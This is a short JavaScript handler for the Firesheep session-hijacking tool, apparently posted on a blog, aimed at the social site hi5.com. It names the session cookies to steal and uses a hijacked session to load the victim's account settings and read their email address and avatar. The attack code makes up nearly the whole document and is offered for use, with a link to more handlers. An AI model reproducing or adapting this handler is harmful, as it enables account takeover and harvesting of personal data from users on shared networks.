// Author
// cityZombie <chebon9@gmail.com>
// For more handlers visit : http://firesheepfan.blogspot.com/
register({
name: "hi5",
domains: [ 'hi5.com' ],
sessionCookieNames: [ 'JSESSIONID','Userid' ],
identifyUser: function () {
var resp = this.httpGet(this.siteUrl + "friend/account/settings.do");
this.userName = resp.body.querySelector("input[name='email']").value;
this.userAvatar = resp.body.querySelector('#PageHeader-Avatar img').src;
}
});
No comments:
Post a Comment